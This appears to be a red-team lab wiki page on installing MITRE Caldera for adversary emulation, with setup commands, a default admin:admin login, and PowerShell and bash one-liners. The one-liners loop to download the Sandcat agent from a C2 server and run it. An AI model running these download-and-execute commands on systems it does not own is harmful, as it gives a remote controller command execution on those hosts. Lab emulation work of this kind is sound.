C2 Matrix
Search…
Lab Infrastructure
C2
Attack Infrastructure
Detection
Caldera
Install Caldera
Ensure Docker is installed first. Run as root
1
cd /opt
2
sudo git clone https://github.com/mitre/caldera.git --recursive
3
cd caldera
4
sudo ./install.sh --kali
Copied!
Run Caldera
1
cd /opt/caldera
2
source calderaenv/bin/activate
3
python server.py
4
5
http://127.0.0.1:8888
6
admin:admin
Copied!
Deploy Agent
Windows
1
$url="http://192.168.120.135:8888/file/download"; $wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows"); $wc.Headers.add("file","sandcat.go"); $output="C:\Users\Public\sandcat.exe";$wc.DownloadFile($url,$output); C:\Users\Public\sandcat.exe -server http://192.168.120.135:8888 -group my_group;
2
OR
3
while($true) {$url="http://192.168.120.135:443/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("file","sandcat.exe");$output="C:\Users\Public\sandcat.exe";$wc.DownloadFile($url,$output);C:\Users\Public\sandcat.exe http://192.168.120.135:443 my_group; sleep 60}
Copied!
Linux
1
while true; do curl -sk -X POST -H 'file:sandcat-linux' http://localhost:8888/file/download > /tmp/sandcat-linux && chmod +x /tmp/sandcat-linux && /tmp/sandcat-linux http://localhost:8888 my_group; sleep 60; done
Copied!
Understanding Caldera
Presentation from Erik van Buggenhout: https://www.slideshare.net/erikvanbuggenhout/adversary-emulation-using-caldera
Last modified 2yr ago
Copy link